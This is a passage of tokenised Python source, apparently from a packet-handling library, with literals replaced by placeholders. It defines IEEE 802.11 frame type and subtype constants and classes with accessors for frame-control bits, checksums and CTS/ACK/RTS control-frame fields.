= int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED1 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED2 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED2 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_BEACON = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_BEACON << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ATIM = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ATIM << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_DISASSOCIATION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_AUTHENTICATION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_DEAUTHENTICATION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ACTION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ACTION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED3 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED4 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED7 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED8 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_BLOCK_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CF_END = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED1 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED2 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED2 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED3 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED4 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED5 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED5 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED6 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED6 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED7 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED7 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK_REQUEST = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_BLOCK_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CF_END = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CF_END << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_NULL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_DATA_SUBTYPE_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_NULL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_NULL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_NULL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_RESERVED1 = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_CF_ACK_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED7 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED8 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED9 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED10 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED11 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED12 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED13 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED14 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED15 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED16 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED1 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED2 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED2 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED3 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED4 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED5 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED5 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED6 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED6 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED7 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED7 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED8 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED8 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED9 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED9 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED10 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED10 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED11 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED11 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED12 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED12 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED13 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED13 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED14 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED14 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED15 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED15 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED16 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED16 << <NUM_LIT:2> <EOL> class Dot11 ( ProtocolPacket ) : <EOL> def __init__ ( self , aBuffer = None , FCS_at_end = True ) : <EOL> header_size = <NUM_LIT:2> <EOL> self . __FCS_at_end = not not FCS_at_end <EOL> if self . __FCS_at_end : <EOL> tail_size = <NUM_LIT:4> <EOL> else : <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_order ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:7> ) & <NUM_LIT> ) <EOL> def set_order ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:7> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_protectedFrame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_protectedFrame ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_moreData ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_moreData ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_powerManagement ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_powerManagement ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_retry ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:3> ) & <NUM_LIT> ) <EOL> def set_retry ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:3> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_moreFrag ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_moreFrag ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:2> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_fromDS ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:1> ) & <NUM_LIT> ) <EOL> def set_fromDS ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:1> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_toDS ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_toDS ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_subtype ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_subtype ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_type ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_type ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_type_n_subtype ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_type_n_subtype ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_version ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_version ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def compute_checksum ( self , bytes ) : <EOL> crcle = crc32 ( bytes ) & <NUM_LIT> L <EOL> crc = struct . pack ( '<STR_LIT>' , crcle ) <EOL> ( crc_long , ) = struct . unpack ( '<STR_LIT>' , crc ) <EOL> return crc_long <EOL> def is_QoS_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_no_framebody_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_cf_poll_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_cf_ack_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def get_fcs ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . __FCS_at_end : <EOL> return None <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> def set_fcs ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if not self . __FCS_at_end : <EOL> return <EOL> if value is None : <EOL> payload = self . get_body_as_string ( ) <EOL> crc32 = self . compute_checksum ( payload ) <EOL> value = crc32 <EOL> nb = value & <NUM_LIT> <EOL> self . tail . set_long ( - <NUM_LIT:4> , nb ) <EOL> class Dot11ControlFrameCTS ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> class Dot11ControlFrameACK ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> class Dot11ControlFrameRTS ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> 